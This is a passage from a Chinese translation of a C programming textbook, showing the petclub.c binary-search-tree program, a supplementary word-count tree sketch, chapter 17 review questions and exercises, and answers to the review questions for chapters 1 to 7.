的程序以菜单的方式提供选择:向俱乐部成员花名册添加宠物、显示成员列 表、报告成员数量、核实成员及退出。main()函数很简单,主要提供程序的 大纲。具体工作主要由支持函数来完成。 程序清单17.12 petclub.c程序 /* petclub.c -- 使用二叉查找数 */ #include <stdio.h> #include <string.h> #include <ctype.h> #include "tree.h" 1431 char menu(void); void addpet(Tree * pt); void droppet(Tree * pt); void showpets(const Tree * pt); void findpet(const Tree * pt); void printitem(Item item); void uppercase(char * 
str); char * s_gets(char * st, int n); int main(void) { Tree pets; char choice; InitializeTree(&pets); while ((choice = menu()) != 'q') { switch (choice) { case 'a':  addpet(&pets); break; 1432 case 'l':  showpets(&pets); break; case 'f':  findpet(&pets); break; case 'n':  printf("%d pets in club\n", TreeItemCount(&pets)); break; case 'd':  droppet(&pets); break; default:  puts("Switching error"); } } DeleteAll(&pets); puts("Bye."); return 0; } char menu(void) { int ch; 1433 puts("Nerfville Pet Club Membership Program"); puts("Enter the letter corresponding to your choice:"); puts("a) add a pet       l) show list of pets"); puts("n) number of pets   f) find pets"); puts("d) delete a pet     q) quit"); while ((ch = getchar()) != EOF) { while (getchar() != '\n') /* 处理输入行的剩余内容 */ continue; ch = tolower(ch); if (strchr("alrfndq", ch) == NULL) puts("Please enter an a, l, f, n, d, or q:"); else break; } if (ch == EOF)   /* 使程序退出 */ ch = 'q'; return ch; } 1434 void addpet(Tree * pt) { Item temp; if (TreeIsFull(pt)) puts("No room in the club!"); else { puts("Please enter name of pet:"); s_gets(temp.petname, SLEN); puts("Please enter pet kind:"); s_gets(temp.petkind, SLEN); uppercase(temp.petname); uppercase(temp.petkind); AddItem(&temp, pt); } } void showpets(const Tree * pt) { if (TreeIsEmpty(pt)) 1435 puts("No entries!"); else Traverse(pt, printitem); } void printitem(Item item) { printf("Pet: %-19s  Kind: %-19s\n", item.petname,item.petkind); } void findpet(const Tree * pt) { Item temp; if (TreeIsEmpty(pt)) { puts("No entries!"); return;  /* 如果树为空,则退出该函数 */ } puts("Please enter name of pet you wish to find:"); s_gets(temp.petname, SLEN); puts("Please enter pet kind:"); 1436 s_gets(temp.petkind, SLEN); uppercase(temp.petname); uppercase(temp.petkind); printf("%s the %s ", temp.petname, temp.petkind); if (InTree(&temp, pt)) printf("is a member.\n"); else printf("is not a member.\n"); } void droppet(Tree * pt) { Item temp; if (TreeIsEmpty(pt)) { puts("No entries!"); return;  /* 如果树为空,则退出该函数 */ } puts("Please enter name of pet you wish to delete:"); s_gets(temp.petname, SLEN); 1437 puts("Please enter pet kind:"); s_gets(temp.petkind, SLEN); uppercase(temp.petname); uppercase(temp.petkind); printf("%s the %s ", temp.petname, temp.petkind); if (DeleteItem(&temp, pt)) printf("is dropped from the club.\n"); else printf("is not a member.\n"); } void uppercase(char * str) { while (*str) { *str = toupper(*str); str++; } } char * s_gets(char * st, int n) 1438 { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)        // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;    // 处理输入行的剩余内容 } return ret_val; } 该程序把所有字母都转换为大写字母,所以SNUFFY、Snuffy和snuffy都 被视为相同。下面是该程序的一个运行示例: Nerfville Pet Club Membership Program Enter the letter corresponding to your choice: 1439 a) add a pet        l) show list of pets n) number of pets     f) find pets q) quit a Please enter name of pet: Quincy Please enter pet kind: pig Nerfville Pet Club Membership Program Enter the letter corresponding to your choice: a) add a pet        l) show list of pets n) number of pets     f) find pets q) quit a Please enter name of pet: Bennie Haha Please enter pet kind: parrot Nerfville Pet Club Membership Program 1440 Enter the letter corresponding to your choice: a) add a pet        l) show list of pets n) number of pets     f) find pets q) quit a Please enter name of pet: Hiram Jinx Please enter pet kind: domestic cat Nerfville Pet Club 
Membership Program Enter the letter corresponding to your choice: a) add a pet        l) show list of pets n) number of pets     f) find pets q) quit n 3 pets in club Nerfville Pet Club Membership Program Enter the letter corresponding to your choice: a) add a pet        l) show list of pets 1441 n) number of pets     f) find pets q) quit l Pet: BENNIE HAHA         Kind: PARROT Pet: HIRAM JINX          Kind: DOMESTIC CAT Pet: QUINCY             Kind: PIG Nerfville Pet Club Membership Program Enter the letter corresponding to your choice: a) add a pet        l) show list of pets n) number of pets     f) find pets q) quit q Bye. 17.7.5 树的思想 二叉查找树也有一些缺陷。例如,二叉查找树只有在满员(或平衡)时 效率最高。假设要储存用户随机输入的单词。该树的外观应如图17.12所 示。现在,假设用户按字母顺序输入数据,那么每个新节点应该被添加到右 边,该树的外观应如图17.16所示。图17.12所示是平衡的树,图17.16所示是 不平衡的树。查找这种树并不比查找链表要快。 避免串状树的方法之一是在创建树时多加注意。如果树或子树的一边或 另一边太不平衡,就需要重新排列节点使之恢复平衡。与此类似,可能在进 1442 行删除操作后要重新排列树。俄国数学家Adel’son-Vel’skii和Landis发明了一 种算法来解决这个问题。根据他们的算法创建的树称为AVL树。因为要重 构,所以创建一个平衡的树所花费的时间更多,但是这样的树可以确保最大 化搜索效率。 你可能需要一个能储存相同项的二叉查找树。例如,在分析一些文本 时,统计某个单词在文本中出现的次数。一种方法是把 Item 定义成包含一 个单词和一个数字的结构。第一次遇到一个单词时,将其添加到树中,并且 该单词的数量加 1。下一次遇到同样的单词时,程序找到包含该单词的节 点,并递增表示该单词数量的值。把基本二叉查找树修改成具有这一特性, 不费多少工夫。 考虑Nerfville宠物俱乐部的示例,有另一种情况。示例中的树根据宠物 的名字和种类进行排列,所以,可以把名为Sam的猫储存在一个节点中,把 名为Sam的狗储存在另一节点中,把名为Sam的山羊储存在第3个节点中。但 是,不能储存两只名为Sam的猫。另一种方法是以名字来排序,但是这样做 只能储存一个名为Sam的宠物。还需要把Item定义成多个结构,而不是一个 结构。第一次出现Sally时,程序创建一个新的节点,并创建一个新的列 表,然后把Sally及其种类添加到列表中。下一次出现Sally时,程序将定位 到之前储存Sally的节点,并把新的数据添加到结构列表中。 提示 插件库 读者可能意识到实现一个像链表或树这样的ADT比较困难,很容易犯 错。插件库提供了一种可选的方法:让其他人来完成这些工作和测试。在学 完本章这两个相对简单的例子后,读者应该能很好地理解和认识这样的库。 1443 图17.16 不平衡的二叉查找树 1444 17.8 其他说明 本书中,我们涵盖了C语言的基本特性,但是只是简要介绍了库。ANSI C库中包含多种有用的函数。绝大部分实现都针对特定的系统提供扩展库。 基于Windows的编译器支持Windows图形接口。Macintosh C编译器提供访问 Macintosh 工具箱的函数,以便编写具有标准 Macintosh 接口或 iOS 系统的程 序产品,如iPhone或iPad。与此类似,还有一些工具用于创建Linux程序的图 形接口。花时间查看你的系统提供什么。如果没有你想要的工具,就自己编 写函数。这是C的一部分。如果认为自己能编写一个更好的(如,输入函 数),那就去做!随着你不断练习并提高自己的编程技术,会从一名新手成 为经验丰富的资深程序员。 如果对链表、队列和树的相关概念感兴趣或觉得很有用,可以阅读其他 相关的书籍,学习高级编程技巧。计算机科学家在开发和分析算法以及如何 表示数据方面投入了大量的时间和精力。也许你会发现已经有人开发了你正 需要的工具。 学会C语言后,你可能想研究C++、Objectiv C或Java。这些都是以C为 基础的面向对象(object-oriented)语言。C已经涵盖了从简单的char类型变 量到大型且复杂的结构在内的数据对象。面向对象语言更进一步发展了对象 的观点。例如,对象的性质不仅包括它所储存的信息类型,而且还包括了对 其进行的操作类型。本章介绍的ADT就遵循了这种模式。而且,对象可以继 承其他对象的属性。OOP提供比C更高级的抽象,很适合编写大型程序。 请参阅附录B中的参考资料I“补充阅读”中找到你感兴趣的书籍。 1445 17.9 关键概念 一种数据类型通过以下几点来表征:如何构建数据、如何储存数据、有 哪些可能的操作。抽象数据类型(ADT)以抽象的方式指定构成某种类型特 征的属性和操作。从概念上看,可以分两步把ADT翻译成一种特定的编程语 言。第1步是定义编程接口。在C中,通过使用头文件定义类型名,并提供 与允许的操作相应的函数原型来实现。第2步是实现接口。在C中,可以用 源代码文件提供与函数原型相应的函数定义来实现。 1446 17.10 本章小结 链表、队列和二叉树是ADT在计算机程序设计中常用的示例。通常用动 态内存分配和链式结构来实现它们,但有时用数组来实现会更好。 当使用一种特定类型(如队列或树)进行编程时,要根据类型接口来编 写程序。这样,在修改或改进实现时就不用更改使用接口的那些程序。 1447 17.11 复习题 1.定义一种数据类型涉及哪些内容? 2.为什么程序清单17.2 只能沿一个方向遍历链表?如何修改struct film定 义才能沿两个方向遍历链表? 3.什么是ADT? 4.QueueIsEmpty()函数接受一个指向queue结构的指针作为参数,但是也 可以将其编写成接受一个queue结构作为参数。这两种方式各有什么优缺 点? 5.栈(stack)是链表系列的另一种数据形式。在栈中,只能在链表的一 端添加和删除项,项被“压入”栈和“弹出”栈。因此,栈是一种LIFO(即后进 先出last in,first out)结构。 a.设计一个栈ADT b.为栈设计一个C编程接口,例如stack.h头文件 6.在一个含有3个项的分类列表中,判断一个特定项是否在该列表中, 用顺序查找和二叉查找方法分别需要最多多少次?当列表中有1023个项时分 别是多少次?65535个项是分别是多少次? 7.假设一个程序用本章介绍的算法构造了一个储存单词的二叉查找树。 假设根据下面所列的顺序输入 单词,请画出每种情况的树: a.nice food roam dodge gate office wave b.wave roam office nice gate food dodge c.food dodge roam wave office gate nice 1448 d.nice roam office food wave gate dodge 8.考虑复习题7构造的二叉树,根据本章的算法,删除单词food之后, 各树是什么样子? 
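(17.7.5 节补充示例)前面提到,可以把 Item 改成“单词 + 出现次数”的结构,用二叉查找树统计文本中各单词出现的次数。下面是一个独立的小草图,仅演示这一思路:它没有使用本章的 tree.h 接口,wnode、addword() 等名称都是为演示而假设的,也可以作为编程练习 7 的一种入手思路。

/* wordcount.c -- 用二叉查找树统计单词出现次数的独立草图 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define WORDMAX 40
struct wnode {
    char word[WORDMAX];    /* 单词        */
    int count;             /* 出现次数    */
    struct wnode * left;
    struct wnode * right;
};
/* 在树中查找单词 w:已存在则计数加 1,否则新建节点 */
struct wnode * addword(struct wnode * root, const char * w)
{
    int cmp;
    if (root == NULL)
    {
        root = (struct wnode *) malloc(sizeof(struct wnode));
        if (root == NULL)
        {
            fprintf(stderr, "out of memory\n");
            exit(EXIT_FAILURE);
        }
        strncpy(root->word, w, WORDMAX - 1);
        root->word[WORDMAX - 1] = '\0';
        root->count = 1;
        root->left = root->right = NULL;
    }
    else if ((cmp = strcmp(w, root->word)) == 0)
        root->count++;                       /* 重复单词:只递增计数 */
    else if (cmp < 0)
        root->left = addword(root->left, w);
    else
        root->right = addword(root->right, w);
    return root;
}
/* 中序遍历:按字母顺序打印单词及其出现次数 */
void printwords(const struct wnode * root)
{
    if (root != NULL)
    {
        printwords(root->left);
        printf("%-20s %d\n", root->word, root->count);
        printwords(root->right);
    }
}
int main(void)
{
    struct wnode * root = NULL;
    char w[WORDMAX];
    while (scanf("%39s", w) == 1)   /* 从标准输入逐个读单词,直到文件结尾 */
        root = addword(root, w);
    printwords(root);
    return 0;
}

为保持简短,该草图省略了释放节点内存的代码;实际程序应像本章的 DeleteAll() 那样,在结束前释放整棵树。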
1449 17.12 编程练习 1.修改程序清单17.2,让该程序既能正序也能逆序显示电影列表。一种 方法是修改链表的定义,可以双向遍历链表。另一种方法是用递归。 2.假设list.h(程序清单17.3)使用下面的list定义: typedef struct list { Node * head;  /* 指向list的开头 */ Node * end;/* 指向list的末尾 */ } List; 重写 list.c(程序清单 17.5)中的函数以适应新的定义,并通过 films.c(程序清单 17.4)测试最终的代码。 3.假设list.h(程序清单17.3)使用下面的list定义: #define MAXSIZE 100 typedef struct list { Item entries[MAXSIZE]; /* 内含项的数组 */ int items;       /* list中的项数 */ } List; 重写 list.c(程序清单 17.5)中的函数以适应新的定义,并通过 films.c(程序清单 17.4)测试最终的代码。 1450 4.重写mall.c(程序清单17.7),用两个队列模拟两个摊位。 5.编写一个程序,提示用户输入一个字符串。然后该程序把该字符串的 字符逐个压入一个栈(参见复习题5),然后从栈中弹出这些字符,并显示 它们。结果显示为该字符串的逆序。 6.编写一个函数接受 3 个参数:一个数组名(内含已排序的整数)、该 数组的元素个数和待查找的整数。如果待查找的整数在数组中,那么该函数 返回 1;如果该数不在数组中,该函数则返回 0。用二分查找法实现。 7.编写一个程序,打开和读取一个文本文件,并统计文件中每个单词出 现的次数。用改进的二叉查找树储存单词及其出现的次数。程序在读入文件 后,会提供一个有3个选项的菜单。第1个选项是列出所有的单词和出现的次 数。第2个选项是让用户输入一个单词,程序报告该单词在文件中出现的次 数。第3个选项是退出。 8.修改宠物俱乐部程序,把所有同名的宠物都储存在同一个节点中。当 用户选择查找宠物时,程序应询问用户该宠物的名字,然后列出该名字的所 有宠物(及其种类)。 1451 附录A 复习题答案 A.1 第1章复习题答案 1.完美的可移植程序是,其源代码无需修改就能在不同计算机系统中成 功编译的程序。 2.源代码文件包含程序员使用的任何编程语言编写的代码。目标代码文 件包含机器语言代码,它不必是完整的程序代码。可执行文件包含组成可执 行程序的完整机器语言代码。 3.(1)定义程序目标;(2)设计程序;(3)编写程序;(4)编译程 序;(5)运行程序;(6)测试和调试程序;(7)维护和修改程序。 4.编译器把源代码(如,用C语言编写的代码)翻译成等价的机器语言 代码(也叫作目标代码)。 5.链接器把编译器翻译好的源代码以及库代码和启动代码组合起来,生 成一个可执行程序。 A.2 第2章复习题答案 1.它们都叫作函数。 2.语法错误违反了组成语句或程序的规则。这是一个有语法错误的英文 例子:Me speak English good.。这是一个有语法错误的C语言例子: printf"Where are the parentheses?";。 3.语义错误是指含义错误。这是一个有语义错误的英文例子:This sentence isexcellent Czech.[1]。这是一个有语义错误的C语言例子: thrice_n = 3 + n;[2]。 4.第1行:以一个#开始;studio.h应改成stdio.h;然后用一对尖括号把 1452 stdio.h括起来。 第2行:把{}改成();注释末尾把/*改成*/。 第3行:把(改成{ 第4行:int s末尾加上一个分号。 第5行没问题。 第6行:把:=改成,赋值用=,而不是用:=(这说明Indiana Sloth了解 Pascal)。另外,用于赋值的值56也不对,一年有52周,不是56周。 第7行应该是:printf("There are %d weeks in a year.\n", s); 第9行:原程序中没有第9行,应该在该行加上一个右花括号}。 修改后的程序如下: #include <stdio.h> int main(void) /* this prints the number of weeks in a year */ { int s; s = 52; printf("There are %d weeks in a year.\n", s); return 0; } 5.a.Baa Baa Black Sheep.Have you any wool?(注意,Sheep.和Have之间 没有空格) 1453 b.Begone! O creature of lard! c.What? No/nfish? (注意斜杠/和反斜杠\的效果不同,/只是一个普通的字符,原样打印) d.2 + 2 = 4 (注意,每个%d与列表中的值相对应。还要注意,+的意思是加法,可 以在printf()语句内部计算) 6.关键字是int和char(main是一个函数名;function是函数的意思;=是 一个运算符)。 7.printf("There were %d words and %d lines.\n", words, lines); 8.执行完第7行后,a是5,b是2。执行完第8行后,a和b都是5。执行完 第9行后,a和b仍然是5(注意,a不会是2,因为在执行a = b;时,b的值已经 被改为5)。 9.执行完第7行后,x是10,b是5。执行完第8行后,x是10,y是15。执 行完第9行后,x是150,y是15。 A.3 第3章复习题答案 1.a.int类型,也可以是short类型或unsigned short类型。人口数是一个整 数。 b.float类型,价格通常不是一个整数(也可以使用double类型,但实际 上不需要那么高的精度)。 c.char类型。 1454 d.int类型,也可以是unsigned类型。 2.原因之一:在系统中要表示的数超过了int可表示的范围,这时要使用 long类型。原因之二:如果要处理更大的值,那么使用一种在所有系统上都 保证至少是 32 位的类型,可提高程序的可移植性。 3.如果要正好获得32位的整数,可以使用int32_t类型。要获得可储存至 少32位整数的最小类型,可以使用int_least32_t类型。如果要为32位整数提 供最快的计算速度,可以选择int_fast32_t类型(假设你的系统已定义了上述 类型)。 4.a.char类型常量(但是储存为int类型) b.int类型常量 c.double类型常量 d.unsigned int类型常量,十六进制格式 e.double类型常量 5.第1行:应该是#include <stdio.h> 第2行:应该是int main(void) 第3行:把(改为{ 第4行:g和h之间的;改成, 第5行:没问题 第6行:没问题 第7行:虽然这数字比较大,但在e前面应至少有一个数字,如1e21或 1.0e21都可以。 1455 第8行:没问题,至少没有语法问题。 第9行:把)改成} 除此之外,还缺少一些内容。首先,没有给rate变量赋值;其次未使用h 变量;而且程序不会报告计算结果。虽然这些错误不会影响程序的运行(编 译器可能给出变量未被使用的警告),但是它们确实与程序设计的初衷不符 合。另外,在该程序的末尾应该有一个return语句。 下面是一个正确的版本,仅供参考: #include <stdio.h> int main(void) { float g, h; float tax, rate; rate = 0.08; g = 1.0e5; tax = rate*g; h = g + tax; printf("You owe $%f plus $%f in taxes for a total of $%f.\n", g, tax, h); return 0; } 6. 1456 7. 
8.printf("The odds against the %d were %ld to 1.\n", imate, shot);printf("A score of %f is not an %c grade.\n", log, grade); 9.ch = '\r'; ch = 13; ch = '\015' ch = '\xd' 10.最前面缺少一行(第0行):#include <stdio.h> 第1行:使用/*和*/把注释括起来,或者在注释前面使用//。 第3行:int cows, legs; 第4行:country?\n"); 1457 第5行:把%c改为%d,把legs改为&legs。 第7行:把%f改为%d。 另外,在程序末尾还要加上return语句。 下面是修改后的版本: #include <stdio.h> int main(void) /* this program is perfect */ { int cows, legs; printf("How many cow legs did you count?\n"); scanf("%d", &legs); cows = legs / 4; printf("That implies there are %d cows.\n", cows); return 0; } 11.a.换行字符 b.反斜杠字符 c.双引号字符 d.制表字符 A.4 第4章复习题答案 1458 1.程序不能正常运行。第1 个scanf()语句只读取用户输入的名,而用户 输入的姓仍留在输入缓冲区中(缓冲区是用于储存输入的临时存储区)。下 一条scang()语句在输入缓冲区查找重量时,从上次读入结束的地方开始读 取。这样就把留在缓冲区的姓作为体重来读取,导致 scanf()读取失败。另一 方面,如果在要求输入姓名时输入Lasha 144,那么程序会把144作为用户的 体重(虽然用户是在程序提示输入体重之前输入了144)。 2.a.He sold the painting for $234.50. b.Hi!(注意,第1个字符是字符常量;第2个字符由十进制整数转换而 来;第3个字符是八进制字符常量的ASCII表示) c.His Hamlet was funny without being vulgar.has 42 characters. d.Is 1.20e+003 the same as 1201.00? 3.在这条语句中使用\":printf("\"%s\"\nhas %d characters.\n", Q, strlen(Q)); 4.下面是修改后的程序: #include <stdio.h>   /* 别忘了要包含合适的头文件 */ #define B "booboo"   /* 添加#、双引号 */ #define X 10     /* 添加# */ int main(void)    /* 不是main(int) */ { int age; int xp;      /* 声明所有的变量 */ char name[40];   /* 把name声明为数组 */ 1459 printf("Please enter your first name.\n"); /* 添加\n,提高可读性 */ scanf("%s", name); printf("All right, %s, what's your age?\n", name); /* %s用于打印字符串*/ scanf("%d", &age); /* 把%f改成%d,把age改成&age */ xp = age + X; printf("That's a %s! You must be at least %d.\n", B, xp); return 0; /* 不是rerun */ } 5.记住,要打印%必须用%%: printf("This copy of \"%s\" sells for $%0.2f.\n", BOOK, cost); printf("That is %0.0f%% of list.\n", percent); 6.a.%d b.%4X c.%10.3f d.%12.2e e.%-30s 7.a.%15lu b.%#4x c.%-12.2E 1460 d.%+10.3f e.%8.8s 8.a.%6.4d b.%*o c.%2c d.%+0.2f e.%-7.5s 9.a.int dalmations; scanf("%d", &dalmations); b.float kgs, share; scanf("%f%f", &kgs, &share); (注意:对于本题的输入,可以使用转换字符e、f和g。另外,除了%c 之外,在%和转换字符之间加空格不会影响最终的结果) c.char pasta[20]; scanf("%s", pasta); d.char action[20]; int value; scanf("%s %d", action, &value); e.int value; 1461 scanf("%*s %d", &value); 10.空白包括空格、制表符和换行符。C 语言使用空白分隔记号。scanf() 使用空白分隔连续的输入项。 11.%z 中的 z 是修饰符,不是转换字符,所以要在修饰符后面加上一个 它修饰的转换字符。可以使用%zd打印十进制数,或用不同的说明符打印不 同进制的数,例如,%zx打印十六进制的数。 12.可以分别把(和)替换成{和}。但是预处理器无法区分哪些圆括号应替 换成花括号,哪些圆括号不能替换成花括号。因此, #define ( { #define ) } int main(void) ( printf("Hello, O Great One!\n"); ) 将变成: int main{void} { printf{"Hello, O Great One!\n"}; } A.5 第5章复习题答案 1462 1.a.30 b.27(不是3)。(12+6)/(2*3)得3。 c.x = 1,y = 1(整数除法)。 d.x = 3(整数除法),y = 9。 2.a.6(由3 + 3.3截断而来) b.52 c.0(0 * 22.0的结果) d.13(66.0 / 5或13.2,然后把结果赋给int类型变量) 3.a.37.5(7.5 * 5.0的结果) b.1.5(30.0 / 20.0的结果) c.35(7 * 5的结果) d.37(150 / 4的结果) e.37.5(7.5 * 5的结果) f.35.0(7 * 5.0的结果) 4.第0行:应增加一行#include <stdio.h>。 第3行:末尾用分号,而不是逗号。 第6行:while语句创建了一个无限循环。因为i的值始终为1,所以它总 是小于30。推测一下,应该是想写while(i++ < 30)。 第6~8行:这样的缩进布局不能使第7行和第8行组成一个代码块。由于 没有用花括号括起来, while循环只包括第7行,所以要添加花括号。 1463 第7行:因为1和i都是整数,所以当i为1时,除法的结果是1;当i为更大 的数时,除法结果为0。用n = 1.0/i,i在除法运算之前会被转换为浮点数, 这样就能得到非零值。 第8行:在格式化字符串中没有换行符(\n),这导致数字被打印成一 行。 第10行:应该是return 0; 下面是正确的版本: #include <stdio.h> int main(void) { int i = 1; float n; printf("Watch out! 
Here come a bunch of fractions!\n"); while (i++ < 30) { n = 1.0/i; printf(" %f\n", n); } printf("That's all, folks!\n"); return 0; 1464 } 5.这个版本最大的问题是测试条件(sec是否大于0?)和scanf()语句获 取sec变量的值之间的关系。具体地说,第一次测试时,程序尚未获得sec的 值,用来与0作比较的是正好在sec变量内存位置上的一个垃圾值。一个比较 笨拙的方法是初始化 sec(如,初始化为 1)。这样就可通过第一次测试。 不过,还有另一个问题。当最后输入0结束程序时,在循环结束之前不会检 查sec,所以0也被打印了出来。因此,更好的方法是在while测试之前使用 scanf()语句。可以这样修改: scanf("%d", &sec); while ( sec > 0 ) { min = sec/S_TO_M; left = sec % S_TO_M; printf("%d sec is %d min, %d sec.\n", sec, min, left); printf("Next input?\n"); scanf("%d", &sec); } while循环第一轮迭代使用的是scanf()在循环外面获取的值。因此,在 while循环的末尾还要使用一次scanf()语句。这是处理类似问题的常用方法。 6.下面是该程序的输出: %s! C is cool! ! C is cool! 11 1465 11 12 11 解释一下。第1个printf()语句与下面的语句相同: printf("%s! C is cool!\n","%s! C is cool!\n"); 第2个printf()语句首先把num递增为11,然后打印该值。第3个printf()语 句打印num的值(值为11)。第 4个printf()语句打印n当前的值(仍为12), 然后将其递减为11。最后一个printf()语句打印num的当前值(值为11)。 7.下面是该程序的输出: SOS:4 4.00 表达式c1 -c2的值和'S' - '0'的值相同(其对应的ASCII值是83 - 79)。 8.把1~10打印在一行,每个数字占5列宽度,然后开始新的一行: 1 2 3 4 5 6 7 8 9 10 9.下面是一个参考程序,假定字母连续编码,与ASCII中的情况一样。 #include <stdio.h> int main(void) { char ch = 'a'; while (ch <= 'g') printf("%5c", ch++); 1466 printf("\n"); return 0; } 10.下面是每个部分的输出: a.1 2 注意,先递增x的值再比较。光标仍留在同一行。 b.101 102 103 104 注意,这次x先比较后递增。在示例a和b中,x都是在先递增后打印。另 外还要注意,虽然第2个printf()语句缩进了,但是这并不意味着它是while循 环的一部分。因此,在while循环结束后,才会调用一次该printf()语句。 c.stuvw 该例中,在第1次调用printf()语句后才会递增ch。 11.这个程序有点问题。while循环没有用花括号把两个缩进的语句括起 来,只有printf()是循环的一部分,所以该程序一直重复打印消息 COMPUTER BYTES DOG,直到强行关闭程序为止。 12.a.x = x + 10; b.x++; or ++x; or x = x + 1; 1467 c.c = 2 * (a + b); d.c = a + 2* b; 13 a.x--; or --x; or x = x - 1; b.m = n % k; c.p = q / (b - a); d.x = (a + b) / (c * d); A.6 第6章复习题答案 1.2,7,70,64,8,2。 2.该循环的输出是: 36 18 9 4 2 1 如果value是double类型,即使value小于1,循环的测试条件仍然为真。 循环将一直执行,直到浮点数下溢生成0为止。另外,value是double类型 时,%3d转换说明也不正确。 3.a.x > 5 b.scanf("%lf",&x) != 1 c.x == 5 4.a.scanf("%d", &x) == 1 b.x != 5 c.x >= 20 5.第4行:应该是list[10]。 1468 第6行:逗号改为分号。i的范围应该是0~9,不是1~10。 第9行:逗号改为分号。>=改成<=,否则,当i等于1时,该循环将成为 无限循环。 第10行:在第10行和第11行之间少了一个右花括号。该右花括号与第7 行的左花括号配对,形成一个for循环块。然后在这个右花括号与最后一个 右花括号之间,少了一行return 0;。 下面是一个正确的版本: #include <stdio.h> int main(void) {                /* 第3行 */ int i, j, list(10);      /* 第4行 */ for (i = 1, i <= 10, i++)    /* 第6行 */ {              /* 第7行 */ list[i] = 2*i + 3;     /* 第8行 */ for (j = 1, j > = i, j++)  /* 第9行 */ printf(" %d", list[j]); /* 第10行 */ printf("\n");       /* 第11行 */ } return 0; } 1469 6.下面是一种方法: #include <stdio.h> int main(void) { int col, row; for (row = 1; row <= 4; row++) { for (col = 1; col <= 8; col++) printf("$"); printf("\n"); } return 0; } 7.a.Hi! Hi! Hi! Bye! Bye! Bye! Bye! Bye! b.ACGM(因为代码中把int类型值与char类型值相加,编译器可能警告 会损失有效数字) 8.a.Go west, youn b.Hp!xftu-!zpvo c.Go west, young 1470 d.$o west, youn 9.其输入如下: 31|32|33|30|31|32|33| *** 1 5 9 13 *** 2 6 4 8 8 10 *** ====== ===== ==== === == 10.a.mint 1471 b.10个元素 c.double 类型的值 d.第ii行正确,mint[2]是double类型的值,&mingt[2]是它在内存中的位 置。 11.因为第1个元素的索引是0,所以循环的范围应该是0~SIZE - 1,而 不是1~SIZE。但是,如果只是这样更改会导致赋给第1个元素的值是0,不 是2。所以,应重写这个循环: for (index = 0; index < SIZE; index++) by_twos[index] = 2 * (index + 1); 与此类似,第2个循环的范围也要更改。另外,应该在数组名后面使用 数组索引: for( index = 0; index < SIZE; index++) printf("%d ", by_twos[index]); 错误的循环条件会成为程序的定时炸弹。程序可能开始运行良好,但是 由于数据被放在错误的位置,可能在某一时刻导致程序不能正常工作。 12.该函数应声明为返回类型为long,并包含一个返回long类型值的return 语句。 13.把num的类型强制转换成long类型,确保计算使用long类型而不是int 类型。在int为16位的系统中,两个int类型值的乘积在返回之前会被截断为一 个int类型的值,这可能会丢失数据。 long square(int num) { 1472 return ((long) num) * num; } 14.输出如下: 1: Hi! 
k = 1 k is 1 in the loop Now k is 3 k = 3 k is 3 in the loop Now k is 5 k = 5 k is 5 in the loop Now k is 7 k = 7 A.7 第7章复习题答案 1.b是true。 2.a.number >= 90 && number < 100 b.ch != 'q' && ch != 'k' c.(number >= 1 && number <= 9) && number != 5 1473 d.可以写成!(number >= 1 && number <= 9),但是number < 1 || number > 9 更好理解。 3.第5行:应该是scanf("%d %d", &weight, &height);。不要忘记scanf()中 要用&。另外,这一行前面应该有提示用户输入的语句。 第9行:测试条件中要表达的意思是(height < 72 && height > 64)。根据前 面第7行中的测试条件,能到第9行的height一定小于72,所以,只需要用表 达式(height > 64)即可。但是,第6行中已经包含了height > 64这个条件,所以 这里完全不必再判断,if else应改成else。 第11行:条件冗余。第2个表达式(weight不小于或不等于300)和第1 个表达式含义相同。只需用一个简单的表达式(weight > 300)即可。但是,问 题不止于此。第 11 行是一个错误的if,这行的else if与第6行的if匹配。但 是,根据if的“最接近规则”,该else if应该与第9行的else if匹配。因此,在 weight小于100且小于或等于64时到达第11行,而此时weight不可能超过 300。 第7行~第10行:应该用花括号括起来。这样第11行就确定与第6行匹 配。但是,如果把第9行的else if替换成简单的else,就不需要使用花括号。 第13行:应简化成if (height > 48)。实际上,完全可以省略这一行。因为 第12行已经测试过该条件。 下面是修改后的版本: #include <stdio.h> int main(void) { int weight, height; /* weight in lbs, height in inches */ printf("Enter your weight in pounds and "); 1474 printf("your height in inches.\n"); scanf("%d %d", &weight, &height); if (weight < 100 && height > 64) if (height >= 72) printf("You are very tall for your weight.\n"); else printf("You are tall for your weight.\n"); else if (weight > 300 && height < 48) printf(" You are quite short for your weight.\n"); else printf("Your weight is ideal.\n"); return 0; } 4.a.1。5确实大于2,表达式为真,即是1。 b.0。3比2大,表达式为假,即是0。 c.1。如果第 1 个表达式为假,则第 2 个表达式为真,反之亦然。所 以,只要一个表达式为真,整个表达式的结果即为真。 d.6。因为6 > 2为真,所以(6 > 2)的值为1。 e.10。因为测试条件为真。 1475 f.0。如果x > y为真,表达式的值就是y > x,这种情况下它为假或0。如 果x > y为假,那么表达式的值就是x > y,这种情况下为假。 5.该程序打印以下内容: *#%*#%$#%*#%*#%$#%*#%*#%$#%*#%*#% 无论怎样缩排,每次循环都会打印#,因为缩排并不能让putchar('#');成 为if else复合语句的一部分。 6.程序打印以下内容: fat hat cat Oh no! hat cat Oh no! cat Oh no! 7.第5行~第7行的注释要以*/结尾,或者把注释开头的/*换成//。表达 式'a' <= ch >= 'z'应替换成ch >= 'a' && ch <= 'z'。 或者,包含 ctype.h 并使用 islower(),这种方法更简单,而且可移植性 更高。顺带一提,虽然从 C 的语法方面看,'a' <= ch >= 'z'是有效的表达式, 但是它的含义不明。因为关系运算符从左往右结合,该表达式被解释成('a' <= ch) >= 'z'。圆括号中的表达式的值不是1就是0(真或假),然后判断该值 是否大于或等于'z'的数值码。1和0都不满足测试条件,所以整个表达式恒为 0(假)。在第2个测试表达式中,应该把||改成&&。另外,虽然!(ch< 'A')是 有 效的表达式,而且含义也正确,但是用ch >= 'A'更简单。这一行的'z'后 面应该有两个圆括号。更简单的方法是使用isuupper()。在uc++;前面应该加 一行else。否则,每输入一个字符, uc 都会递增 1。另外,在 printf()语句中 的格式化字符串应该用双引号括起来。下面是修改后的版本: #include <stdio.h> 1476 #include <ctype.h> int main(void) { char ch; int lc = 0; /*统计小写字母*/ int uc = 0; /*统计大写字母*/ int oc = 0; /*统计其他字母*/ while ((ch = getchar()) != '#') { if (islower(ch)) lc++; else if (isupper(ch)) uc++; else oc++; } printf("%d lowercase, %d uppercase, %d other", lc, uc, oc); return 0; } 1477 8.该程序将不停重复打印下面一行: 